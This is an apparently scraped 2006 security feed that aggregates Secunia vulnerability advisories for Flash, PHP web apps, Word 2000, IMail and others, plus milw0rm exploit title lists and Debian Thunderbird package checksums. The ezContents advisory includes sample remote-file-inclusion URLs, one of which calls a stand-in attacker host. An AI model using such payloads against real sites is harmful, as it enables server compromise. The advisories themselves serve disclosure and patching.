http://milw0rm.com/exploits/2334]]> http://secunia.com/advisories/21844/ Tue, 19 Sep 2006 09:41:33 -0400 Release Date: 2006-09-12
Last Update: 2006-09-18

Critical:
Highly critical
Impact: Security Bypass
System access
Where: From remote
Solution Status: Vendor Patch

Software: Macromedia Flash 8.x
Macromedia Flash MX 2004
Macromedia Flash MX Professional 2004
Macromedia Flash Player 7.x
Macromedia Flash Player 8.x
Macromedia Flex 1.x

CVE reference: CVE-2006-3014 (Secunia mirror)
CVE-2006-3311 (Secunia mirror)
CVE-2006-4640 (Secunia mirror)


Description:
Multiple vulnerabilities have been reported in Adobe Flash Player, which can be exploited by malicious people to bypass certain security restrictions or compromise a user's system.

1) A boundary error during the handling of strings dynamically generated at runtime can be exploited to cause a buffer overflow via an overly long string.

Successful exploitation allows execution of arbitrary code when e.g. visiting a malicious website.

2) An unspecified error allows bypassing the "allowScriptAccess" option.

3) Using a "Shockwave Flash Object", it is possible to execute Flash files containing JavaScript embedded in Office documents automatically when the Office document is opened.

Solution:
Update to version 9.0.16.0 or another fixed version (see the vendor advisory for details).

Provided and/or discovered by:
1) Stuart Pearson, Computer Terrorism UK Ltd.
2) Reported by the vendor.
3) Debasis Mohanty

Changelog:
2006-09-13: Updated advisory with additional information.
2006-09-18: Added link to US-CERT.

Original Advisory:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb06-11.html

Computer Terrorism:
http://www.computerterrorism.com/research/ct12-09-2006.htm

Other References:
Microsoft:
http://www.microsoft.com/technet/security/advisory/925143.mspx

US-CERT VU#451380:
http://www.kb.cert.org/vuls/id/451380


]]> http://secunia.com/advisories/21865/ Tue, 19 Sep 2006 09:40:17 -0400 Release Date: 2006-08-31
Last Update: 2006-09-04

Critical:
Highly critical
Impact: Cross Site Scripting
Manipulation of data
System access
Where: From remote
Solution Status: Unpatched

Software: ezContents 2.x

CVE reference: CVE-2006-4477 (Secunia mirror)
CVE-2006-4478 (Secunia mirror)
CVE-2006-4479 (Secunia mirror)


Description:
DarkFig has discovered some vulnerabilities in ezContents, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks or to compromise a vulnerable system.

1) An error within the "moduleExternalLink()" function in modules/moduleSec.php allows to include arbitrary files from local resources, or from external resources by e.g. using the "ftps" protocol. Note that the "isExternalLink()" function in include/functions.php and the "adminExternalLink()" function in admin/adminbutton.php suffer from the same error.

Example:
http://host/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://attacker/file.php
http://host/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=/tmp/file.php%00

2) Input passed to the "groupname" parameter in headeruserdata.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injection arbitrary SQL code.

3) Input passed to the "subgroupname" parameter in loginreg2.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of a vulnerable site.

The vulnerabilities have been confirmed in version 2.0.3. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
DarkFig
]]> http://secunia.com/advisories/21703/ Fri, 08 Sep 2006 13:57:41 -0400 Release Date: 2006-09-01
Last Update: 2006-09-08

Critical:
Highly critical
Impact: Cross Site Scripting
Manipulation of data
System access
Where: From remote
Solution Status: Unpatched

Software: Membrepass 1.x

CVE reference: CVE-2006-4528 (Secunia mirror)
CVE-2006-4529 (Secunia mirror)
CVE-2006-4530 (Secunia mirror)


Description:
DarkFig has discovered some vulnerabilities in Membrepass, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks, and to compromise a vulnerable system.

1) Input passed to the "recherche" form field in parameter in recherchemembre.php and to the "email" parameter in test.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2) Input passed to the "recherche" form field parameter in recherchemembre.php is also not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation requires that "magic_quotes_gpc" is disabled.

3) Input passed to multiple parameters in include/change.php is not properly sanitised before being stored in a PHP script. This can be exploited to inject and execute arbitrary PHP code.

Successful exploitation requires that "register_globals" is enabled and "magic_quotes_gpc" is disabled.

The vulnerabilities have been confirmed in version 1.5. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
DarkFig]]> http://secunia.com/advisories/21715/ Fri, 08 Sep 2006 13:57:17 -0400 Release Date: 2006-09-01

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

Software: MailGate Email Firewall 6.x


Description:
A vulnerability has been reported in Tumbleweed EMF, which can be exploited by malicious people to compromise a vulnerable system.

For more information:
SA21714

Solution:
Apply hotfix.
https://kb1.tumbelweed.com/article.asp?article=4175&p=2

Provided and/or discovered by:
Michael Ligh, Greg Sinclair, and Amanda Wright.

Other References:
SA21714:
http://secunia.com/advisories/21714/]]> http://secunia.com/advisories/21718/ Fri, 08 Sep 2006 13:56:12 -0400 Release Date: 2006-09-01

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: CAPI4Hylafax 1.x

CVE reference: CVE-2006-3126 (Secunia mirror)


Description:
A vulnerability has been reported in Capi4Hylafax, which potentially can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to an error in c2faxrecv, which doesn't properly sanitise TSI strings when handling incoming calls. This can be exploited to execute shell commands with privileges of the user running c2faxrecv.

Solution:
Use another product.

Provided and/or discovered by:
Lionel Elie Mamane

Original Advisory:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=382474]]> http://secunia.com/advisories/21726/ Fri, 08 Sep 2006 13:55:53 -0400
Secunia Advisory: SA21733
Release Date: 2006-09-04
Last Update: 2006-09-08

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: TikiWiki 1.x

CVE reference: CVE-2006-4602 (Secunia mirror)


Description:
rgod has discovered a vulnerability in TikiWiki, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to the "jhot.php" script not correctly verifying uploaded files. This can e.g. be exploited to execute arbitrary PHP code by uploading a malicious PHP script to the "img/wiki" directory.

The vulnerability has been confirmed in version 1.9.4. Other versions may also be affected.

Solution:
Edit the source code to ensure proper handling of uploaded files.

Provided and/or discovered by:
rgod

Changelog:
2006-09-08: Added CVE reference.


]]> http://secunia.com/advisories/21733/ Fri, 08 Sep 2006 13:54:40 -0400 Release Date: 2006-09-04

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Retro64 CR64Loader ActiveX Control


Description:
CERT/CC has reported a vulnerability in CR64Loader ActiveX Control, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to an unspecified boundary error and can be exploited to cause a buffer overflow when e.g. visiting a malicious website.

Successful exploitation allows execution of arbitrary code.

Solution:
Set the kill bit for CLSID: "{288C5F13-7E52-4ADA-A32E-F5BF9D125F99}"

See Microsoft KB240797 for details.

Provided and/or discovered by:
Will Dormann, CERT/CC.

Original Advisory:
US-CERT VU#649289:
http://www.kb.cert.org/vuls/id/649289

Other References:
Microsoft KB240797:
http://support.microsoft.com/kb/240797]]> http://secunia.com/advisories/21743/ Fri, 08 Sep 2006 13:53:56 -0400 Release Date: 2006-09-04

Critical:
Highly critical
Impact: Security Bypass
Manipulation of data
DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: SuSE eMail Server 3.x
SUSE Linux 10
SUSE Linux 10.1
SuSE Linux 7.x
SuSE Linux 8.x
SuSE Linux 9.0
SuSE Linux 9.1
SUSE Linux 9.2
SUSE Linux 9.3
SuSE Linux Connectivity Server
SuSE Linux Database Server
SuSE Linux Desktop 1.x
SuSE Linux Enterprise Server 7
SuSE Linux Enterprise Server 8
SUSE Linux Enterprise Server 9
SuSE Linux Firewall on CD/Admin host
SuSE Linux Office Server
SuSE Linux Openexchange Server 4.x
SuSE Linux Standard Server 8

CVE reference: CVE-2006-2314 (Secunia mirror)
CVE-2006-3124 (Secunia mirror)
CVE-2006-3125 (Secunia mirror)
CVE-2006-3694 (Secunia mirror)
CVE-2006-4434 (Secunia mirror)
CVE-2006-4089 (Secunia mirror)
CVE-2006-4111 (Secunia mirror)
CVE-2006-4112 (Secunia mirror)


Description:
SUSE has issued an update for multiple packages. These fix some vulnerabilities, which can be exploited by malicious users to bypass certain security restrictions, or by malicious people to conduct SQL injections attacks, cause a DoS (Denial of Service), bypass certain security restrictions, and compromise a vulnerable system.

For more information:
SA20231
SA21009
SA21422
SA21424
SA21579
SA21637
SA21691
SA21721

Solution:
Apply updated packages.

Updated packages are available using YaST Online Update or via the SUSE FTP site.

Original Advisory:
http://lists.suse.com/archive/suse-security-announce/2006-Sep/0001.html

Other References:
SA20231:
http://secunia.com/advisories/20231/

SA21009:
http://secunia.com/advisories/21009/

SA21422:
http://secunia.com/advisories/21422/

SA21424:
http://secunia.com/advisories/21424/

SA21579:
http://secunia.com/advisories/21579/

SA21637:
http://secunia.com/advisories/21637/

SA21691:
http://secunia.com/advisories/21691/

SA21721:
http://secunia.com/advisories/21721/


]]> http://secunia.com/advisories/21749/ Fri, 08 Sep 2006 13:53:17 -0400 Release Date: 2006-09-05
Last Update: 2006-09-07

Critical:
Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Microsoft Office 2000
Microsoft Word 2000

CVE reference: CVE-2006-4534 (Secunia mirror)


Description:
A vulnerability has been discovered in Microsoft Word 2000, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a memory corruption error in WINWORD.EXE when processing Word documents. This can be exploited to execute arbitrary code when a malicious document is opened.

NOTE: The vulnerability is being actively exploited.

The vulnerability is confirmed in a fully patched Microsoft Word 2000 and has currently not been confirmed in other versions. However, they may be affected.

Solution:
Do not open untrusted Office documents.

Provided and/or discovered by:
Discovered in the wild as a 0-day.

Changelog:
2006-09-06: Secunia confirms vulnerability. Added additional information.
2006-09-07: Added link to Microsoft security advisory. Added CVE reference. Added link to US-CERT.

Original Advisory:
Microsoft:
http://www.microsoft.com/technet/security/advisory/925059.mspx

Other References:
US-CERT VU#806548:
http://www.kb.cert.org/vuls/id/806548]]> http://secunia.com/advisories/21735/ Fri, 08 Sep 2006 13:52:35 -0400 Release Date: 2006-09-07
Last Update: 2006-09-08

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

Software: IMail Secure Server 2006
IMail Server 2006
Ipswitch Collaboration Suite 2006

CVE reference: CVE-2006-4379 (Secunia mirror)


Description:
A vulnerability has been reported in IMail Server, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error in the SMTP service when processing certain strings. This can be exploited to cause a stack-based buffer overflow by supplying an overly long string containing "@" and ":" characters.

Successful exploitation allows execution of arbitrary code.

The vulnerability is reported in the following versions:
* Ipswitch Collaboration 2006 Suite Premium Edition
* Ipswitch Collaboration 2006 Suite Standard Edition
* IMail
* IMail Plus
* IMail Secure

Solution:
Update to version 2006.1.

Ipswitch Collaboration Suite Premium Edition:
ftp://ftp.ipswitch.com/Ipswitch/Product_Downloads/ICS_Premium.exe

Ipswitch Collaboration Suite Standard Edition:
ftp://ftp.ipswitch.com/Ipswitch/Product_Downloads/ICS_Standard.exe

IMail:
ftp://ftp.ipswitch.com/Ipswitch/Product_Downloads/IMail.exe

IMail Plus:
ftp://ftp.ipswitch.com/Ipswitch/Product_Downloads/IMail_Plus.exe

IMail Secure:
ftp://ftp.ipswitch.com/Ipswitch/Product_Downloads/IMail_Secure.exe

Provided and/or discovered by:
Discovered by an anonymous person and reported via ZDI.

Changelog:
2006-09-08: Added CVE reference and additional information from ZDI.

Original Advisory:
Ipswitch:
http://www.ipswitch.com/support/ics/updates/ics20061.asp
http://www.ipswitch.com/support/imail/releases/im20061.asp

ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-06-028.html
]]> http://secunia.com/advisories/21795/ Fri, 08 Sep 2006 13:51:16 -0400 Release Date: 2006-09-07

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: phpBB Premod Shadow 2.x


Description:
Kw3[R]Ln has discovered a vulnerability in phpBB Premod Shadow, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "phpbb_root_path" parameter in includes/functions_portal.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been confirmed in version 2.7.1. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Set "register_globals" to "Off".

Provided and/or discovered by:
Kw3[R]Ln

Original Advisory:
http://rst-crew.net/premodshadow.txt
]]> http://secunia.com/advisories/21803/ Fri, 08 Sep 2006 13:48:25 -0400 Release Date: 2006-09-08

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

Software: dsocks 1.x


Description:
Michael Adams has reported a vulnerability in dsocks, which potentially can be exploited by malicious people to compromise a user's system.

The vulnerability is due to a boundary error in the "_tor_resolve()" function in dsocks.c. This can be exploited to cause a stack-based buffer overflow when resolving an overly long host name (e.g. supplied by a malicious website when using dsocks with a browser).

Successful exploitation may allow arbitrary code execution.

Solution:
Update to version 1.4.

Provided and/or discovered by:
Michael Adams


]]> http://secunia.com/advisories/21771/ Fri, 08 Sep 2006 13:47:28 -0400 Release Date: 2006-09-08

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

Software: avast! Home/Professional 4.x
avast! Server Edition 4.x

CVE reference: CVE-2006-4626 (Secunia mirror)


Description:
Ryan Smith has reported a vulnerability in avast!, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error in the anti-virus engine when processing LHA archives. This can be exploited to cause a heap-based buffer overflow via a specially crafted LHA archive with overly long filename and directory name extended-header fields.

Successful exploitation allows execution of arbitrary code.

The vulnerability is reported in the anti-virus engine prior to versions 4.7.869 for desktops and 4.7.660 for servers.

Solution:
Update to a fixed version.

Provided and/or discovered by:
Ryan Smith

Original Advisory:
http://www.hustlelabs.com/advisories/04072006_alwil.pdf]]> http://secunia.com/advisories/21794/ Fri, 08 Sep 2006 13:46:51 -0400 Release Date: 2006-09-08

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Fantastic News 2.x


Description:
Two vulnerabilities have been discovered in Fantastic News, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "CONFIG[script_path]" parameter in archive.php and headlines.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in version 2.1.4. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Set "register_globals" to "Off".

Provided and/or discovered by:
Sx02 and anonymous person.

Original Advisory:
http://sx02.coresec.de/advisories/152.txt
]]> http://secunia.com/advisories/21807/ Fri, 08 Sep 2006 13:46:00 -0400 Release Date: 2006-09-08

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

Software: DokuWiki


Description:
rgod has discovered a vulnerability in DokuWiki, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "TARGET_FN" parameter in bin/dwpage.php is not properly sanitised before being used to copy files. This can be exploited via directory traversal attacks in combination with DokuWiki's file upload feature to execute arbitrary PHP code.

The vulnerability is confirmed in version 2006-03-09b. Other versions may also be affected,

Solution:
Update to version 2006-03-09c and enable support for .htaccess files.

Provided and/or discovered by:
rgod
]]> http://secunia.com/advisories/21819/ Fri, 08 Sep 2006 13:45:02 -0400 Release Date: 2006-09-08

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: ICQ 2003b


Description:
Core Security Technologies has reported a vulnerability in ICQ Pro 2003b, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in the "MCRegEx__Search()" function in the processing of messages with a certain type. This can be exploited to cause a heap-based buffer overflow by specifying an incorrect length value in a message sent to the client.

Successful exploitation allows execution of arbitrary code.

The vulnerability has been reported in build 3916. Other versions may also be affected.

Solution:
The vendor recommends upgrading to ICQ 5.1.

Provided and/or discovered by:
Luciana Tabo, Lucas Lavarello, Sebastian Cufre, Ezequiel Gutesman, and Javier Garcia Di Palma from Core Security Technologies.

Original Advisory:
http://www.coresecurity.com/index.php...ontentMod&action=item&id=1509]]> http://secunia.com/advisories/21834/ Fri, 08 Sep 2006 13:44:27 -0400 2006-09-07 IBM Director <5.10 (Redirect.bat) Directory Transversal Vulnerability
2006-09-01 TIBCO Rendezvous <= 7.4.11 (add router) Remote BOF Exploit
2006-08-29 Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit
2006-08-29 IBM eGatherer <= 3.20.0284.0 (ActiveX) Remote Code Execution Exploit
2006-08-29 Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit
2006-09-08 X11R6 <= 6.4 XKEYBOARD Local Buffer Overflow Exploit (solaris/sparc)
2006-09-08 X11R6 <= 6.4 XKEYBOARD Local Buffer Overflow Exploit (solaris/x86)
2006-09-08 X11R6 <= 6.4 XKEYBOARD Local Buffer Overflow Exploit (sco/x86)
2006-09-01 TIBCO Rendezvous <= 7.4.11 Password Extractor Local Exploit
2006-09-01 PowerZip <= 7.06.3895 Long Filename Handling Buffer Overflow Exploit
2006-08-30 ZipCentral 4.01 ZIP File Handling Local Buffer Overflow Exploit
2006-09-08 Somery <= 0.4.6 (skin_dir) Remote File Include Vulnerability
2006-09-07 PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities
2006-09-07 SL_Site <= 1.0 (spaw_root) Remote File Include Vulnerability
2006-09-07 Web Server Creator v0.1 (l) Remote Include Vulnerability
2006-09-07 Fire Soft Board <= RC 3 (racine) Remote File Include Vulnerability
2006-09-07 DokuWiki <= 2006-03-09b (dwpage.php) Remote Code Execution Exploit
2006-09-07 DokuWiki <= 2006-03-09b (dwpage.php) System Disclosure Exploit
2006-09-07 PhpNews 1.0 (Include) Remote File Include Vulnerabilities
2006-09-07 ACGV News 0.9.1 (PathNews) Remote File Include Vulnerability
2006-09-07 News Evolution 3.0.3 _NE[AbsPath] Remote File Include Vulnerabilities
2006-09-07 WM-News <= 0.5 Multiple Remote File Include Vulnerabilities
2006-09-07 PhotoKorn Gallery <= 1.52 (dir_path) Remote File Include Vulnerabilities
2006-09-06 phpBB Shadow Premod <= 2.7.1 Remote File Include Vulnerability
2006-09-06 BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability
2006-09-06 phpFullAnnu <= 5.1 (repmod) Remote File Include Vulnerability
2006-09-06 Beautifier 0.1 (Core.php) Remote File Include Vulnerability
2006-09-06 Akarru <= 0.4.3.34 (bm_content) Remote File Include Vulnerability
2006-09-05 MySpeach <= 3.0.2 (my_ms[root]) Remote File Include Vulnerability
2006-09-05 GrapAgenda 0.1 (page) Remote File Include Vulnerability
2006-09-05 AnnonceV News Script <= 1.1 (page) Remote File Include Vulnerability
2006-09-05 Zix Forum <= 1.12 (RepId) Remote SQL Injection Vulnerability
2006-09-05 ACGV News <= 0.9.1 (PathNews) Remote File Inclusion Vulnerability
2006-09-05 C-News <= 1.0.1 (path) Remote File Inclusion Vulnerability
2006-09-05 Sponge News <= 2.2 (sndir) Remote File Include Vulnerability
2006-09-05 PhpCommander <= 3.0 Remote Code Execution Exploit (mq=off)
2006-09-04 FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability
2006-09-04 In-link <= 2.3.4 (ADODB_DIR) Remote File Include Vulnerabilities
2006-09-04 SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability
2006-09-04 Tr Forum 2.0 SQL Injection / Bypass Security Restriction Exploit
2006-09-04 pHNews <= alpha 1 (templates_dir) Remote Code Execution Exploit
2006-09-04 PHP Proxima <= v.6 completepack Remote Code Execution Exploit
2006-09-04 SoftBB 0.1 (cmd) Remote Command Execution Exploit
2006-09-03 PmWiki <= 2.1.19 (Zend_Hash_Del_Key_Or_Index) Remote Exploit
2006-09-03 yappa-ng <= 2.3.1 (admin_modules) Remote File Include Vulnerability
2006-09-03 Muratsoft Haber Portal 3.6 (tr) Remote SQL Injection Vulnerability
2006-09-02 TikiWiki <= 1.9 Sirius (jhot.php) Remote Command Execution Exploit
2006-09-02 Annuaire 1Two 2.2 Remote SQL Injection Exploit
2006-09-02 Dyncms <= Release 6 (x_admindir) Remote File Include Vulnerability
2006-09-01 MyBace Light (login_check.php) Remote File Vulnerability
2006-09-01 icblogger v2 (YID) Remote SQL Injection Vulnerability
2006-08-31 Pheap CMS <= 1.1 (lpref) Remote File Include Exploit
2006-08-31 YACS CMS <= 6.6.1 context[path_to_root] Remote File Include Vuln
2006-08-30 phpAtm <= 1.21 (include_location) Remote File Include Vulnerabilities
2006-08-30 Lanifex DMO <= 2.3b (_incMgr) Remote File Include Exploit
2006-08-29 phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit
2006-08-29 PortailPHP mod_phpalbum <= 2.1.5 (chemin) Remote Include Vuln
2006-08-29 MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities
2006-08-29 ExBB Italiano <= 0.2 exbb[home_path] Remote File Include Vulnerability
2006-08-29 phpECard <= 2.1.4 (functions.php) Remote File Include Vulnerability
2006-09-05 J. River Media Center 11.0.309 Remote Denial of Service PoC
2006-09-05 dsock <= 1.3 (buf) Remote Buffer Overflow PoC
]]> http://www.milw0rm.com Fri, 08 Sep 2006 10:33:36 -0400 2006-08-26 MDaemon POP3 Server <9.06 (USER) Remote Heap Overflow Exploit
2006-08-27 VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit
2006-08-27 AlberT-EasySite <= 1.0a5 (PSA_PATH) Remote File Include Exploit
2006-08-27 iziContents <= RC6 GLOBALS[] Remote Code Execution Exploit
2006-08-27 CMS Frogss <= 0.4 (podpis) Remote SQL Injection Exploit
2006-08-27 Ay System CMS <= 2.6 (main.php) Remote File Include Vulnerability
2006-08-26 proManager <= 0.73 (note.php) Remote SQL Injection Vulnerability
]]> http://www.milw0rm.com/exploits/ Mon, 28 Aug 2006 08:12:39 -0400 Release Date: 2006-08-28

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Unpatched

OS: Gentoo Linux 1.x

CVE reference: CVE-2006-4089 (Secunia mirror)


Description:
Gentoo has acknowledged some vulnerabilities in alsaplayer, which potentially can be exploited by malicious people to compromise a user's system.

For more information:
SA21422

Solution:
Gentoo advises to unmerge the "media-sound/alsaplayer" package.

Original Advisory:
http://www.gentoo.org/security/en/glsa/glsa-200608-24.xml

Other References:
SA21422:
http://secunia.com/advisories/21422/


]]> http://secunia.com/advisories/21639/ Mon, 28 Aug 2006 08:11:56 -0400 Release Date: 2006-08-28

Critical:
Highly critical
Impact: Security Bypass
Cross Site Scripting
DoS
System access
Where: From remote
Solution Status: Partial Fix

OS: Debian GNU/Linux 3.1
Debian GNU/Linux unstable alias sid

CVE reference: CVE-2006-2779 (Secunia mirror)
CVE-2006-3805 (Secunia mirror)
CVE-2006-3806 (Secunia mirror)
CVE-2006-3807 (Secunia mirror)
CVE-2006-3808 (Secunia mirror)
CVE-2006-3809 (Secunia mirror)
CVE-2006-3810 (Secunia mirror)


Description:
Debian has issued an update for mozilla-thunderbird. This fixes some vulnerabilities, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks and potentially compromise a user's system.

For more information:
SA19873
SA20382
SA21228

Solution:
Apply updated packages.

NOTE: CVE-2006-2779 is not completely fixed in this update. As a workaround, Debian recommends disabling JavaScript.

-- Debian GNU/Linux 3.1 alias sarge --

Source archives:
http://security.debian.org/pool/updat...thunderbird_1.0.2-2.sarge1.0.8b.1.dsc
Size/MD5 checksum: 1003 04d64af96e791f70b148b47369e78fa8
http://security.debian.org/pool/updat...derbird_1.0.2-2.sarge1.0.8b.1.diff.gz
Size/MD5 checksum: 485519 ee4edfac117a53c5af08ed97fe85fe55
http://security.debian.org/pool/updat...mozilla-thunderbird_1.0.2.orig.tar.gz
Size/MD5 checksum: 33288906 806175393a226670aa66060452d31df4

Alpha architecture:

http://security.debian.org/pool/updat...rbird_1.0.2-2.sarge1.0.8b.1_alpha.deb
Size/MD5 checksum: 12848642 4c5bcb9649ff7eec7d4ad6409fccfbce
http://security.debian.org/pool/updat...d-dev_1.0.2-2.sarge1.0.8b.1_alpha.deb
Size/MD5 checksum: 3279330 5de619881da404d6846a64e1ab100198
http://security.debian.org/pool/updat...ector_1.0.2-2.sarge1.0.8b.1_alpha.deb
Size/MD5 checksum: 151606 aca457a945d7a89cc5ad25952db6d32b
http://security.debian.org/pool/updat...fline_1.0.2-2.sarge1.0.8b.1_alpha.deb
Size/MD5 checksum: 33038 f219f0a68ebce04be1a448d582330e36
http://security.debian.org/pool/updat...dfind_1.0.2-2.sarge1.0.8b.1_alpha.deb
Size/MD5 checksum: 88998 349021463f3a1fca2c269044cf3e66ca

AMD64 architecture:

http://security.debian.org/pool/updat...rbird_1.0.2-2.sarge1.0.8b.1_amd64.deb
Size/MD5 checksum: 12255144 bacce34b5bc0e00ae8dfdcb6db7effee
http://security.debian.org/pool/updat...d-dev_1.0.2-2.sarge1.0.8b.1_amd64.deb
Size/MD5 checksum: 3280524 68041a19610600cd691914971d72e915
http://security.debian.org/pool/updat...ector_1.0.2-2.sarge1.0.8b.1_amd64.deb
Size/MD5 checksum: 150580 d4cd554373b8cf9695e11b172ccd018c
http://security.debian.org/pool/updat...fline_1.0.2-2.sarge1.0.8b.1_amd64.deb
Size/MD5 checksum: 33032 5c7cc39d0f91f8cbd7dfbcd62f5233ea
http://security.debian.org/pool/updat...dfind_1.0.2-2.sarge1.0.8b.1_amd64.deb
Size/MD5 checksum: 88794 ef6eb382de91c862944b1486e5c343a7

ARM architecture:

http://security.debian.org/pool/updat...derbird_1.0.2-2.sarge1.0.8b.1_arm.deb
Size/MD5 checksum: 10342700 42ebac688dbc2943768353f381c48af5
http://security.debian.org/pool/updat...ird-dev_1.0.2-2.sarge1.0.8b.1_arm.deb
Size/MD5 checksum: 3271408 8d1d920dbc27c50d3cef51653ae67571
http://security.debian.org/pool/updat...spector_1.0.2-2.sarge1.0.8b.1_arm.deb
Size/MD5 checksum: 142784 14df28e047604532f99d28d57fd66555
http://security.debian.org/pool/updat...offline_1.0.2-2.sarge1.0.8b.1_arm.deb
Size/MD5 checksum: 33052 441a28a0673a0b4a341ea3d2685ef7a7
http://security.debian.org/pool/updat...eadfind_1.0.2-2.sarge1.0.8b.1_arm.deb
Size/MD5 checksum: 80852 608e1e053e2bfd73099f6e853cdc3b11

Intel IA-32 architecture:

http://security.debian.org/pool/updat...erbird_1.0.2-2.sarge1.0.8b.1_i386.deb
Size/MD5 checksum: 11563882 b41abc362fc0ed424a3a4cd6c4fa8ca6
http://security.debian.org/pool/updat...rd-dev_1.0.2-2.sarge1.0.8b.1_i386.deb
Size/MD5 checksum: 3507108 6c5268e655733613500ee2173f1012ec
http://security.debian.org/pool/updat...pector_1.0.2-2.sarge1.0.8b.1_i386.deb
Size/MD5 checksum: 146250 ba9d20e519d188c237b4b7cef17d3bbe
http://security.debian.org/pool/updat...ffline_1.0.2-2.sarge1.0.8b.1_i386.deb
Size/MD5 checksum: 33052 ef87f87b1ec09d8b1e66591e69895233
http://security.debian.org/pool/updat...adfind_1.0.2-2.sarge1.0.8b.1_i386.deb
Size/MD5 checksum: 87606 925e4a236ba4230a8e32216a064c3f06

Intel IA-64 architecture:

http://security.debian.org/pool/updat...erbird_1.0.2-2.sarge1.0.8b.1_ia64.deb
Size/MD5 checksum: 14624106 a3b234485952ea02ccfdd68133a2cf35
http://security.debian.org/pool/updat...rd-dev_1.0.2-2.sarge1.0.8b.1_ia64.deb
Size/MD5 checksum: 3291038 a15a8ff3fbc471ed4969bb86e67c3c4c
http://security.debian.org/pool/updat...pector_1.0.2-2.sarge1.0.8b.1_ia64.deb
Size/MD5 checksum: 154934 96ab243eb1e9340a6c04743d761febe8
http://security.debian.org/pool/updat...ffline_1.0.2-2.sarge1.0.8b.1_ia64.deb
Size/MD5 checksum: 33034 ef4ff45411db444879bd8171814989e0
http://security.debian.org/pool/updat...adfind_1.0.2-2.sarge1.0.8b.1_ia64.deb
Size/MD5 checksum: 106730 975838d769c3c4e9821ee2f2db1f180a

HP Precision architecture:

http://security.debian.org/pool/updat...erbird_1.0.2-2.sarge1.0.8b.1_hppa.deb
Size/MD5 checksum: 13565080 e4e770db9c3257e4082f6ba9a4b17942
http://security.debian.org/pool/updat...rd-dev_1.0.2-2.sarge1.0.8b.1_hppa.deb
Size/MD5 checksum: 3284790 cd7b3d8fa65712084108545b06bf5cf8
http://security.debian.org/pool/updat...pector_1.0.2-2.sarge1.0.8b.1_hppa.deb
Size/MD5 checksum: 152812 a850d4bbfc5412356adb8999e4afd3a2
http://security.debian.org/pool/updat...ffline_1.0.2-2.sarge1.0.8b.1_hppa.deb
Size/MD5 checksum: 33046 4b2d523df0b35eaf49c2ee670040a746
http://security.debian.org/pool/updat...adfind_1.0.2-2.sarge1.0.8b.1_hppa.deb
Size/MD5 checksum: 96926 49c2664125f88dcbcf8fc370490f1783

Motorola 680x0 architecture:

http://security.debian.org/pool/updat...erbird_1.0.2-2.sarge1.0.8b.1_m68k.deb
Size/MD5 checksum: 10791242 efe7adeef2105ee962f60eb09d32be04
http://security.debian.org/pool/updat...rd-dev_1.0.2-2.sarge1.0.8b.1_m68k.deb
Size/MD5 checksum: 3270798 a64399e4e34ec761ddb064e650432d47
http://security.debian.org/pool/updat...pector_1.0.2-2.sarge1.0.8b.1_m68k.deb
Size/MD5 checksum: 144566 c368a1f6bda4a639c799903d3bed7c86
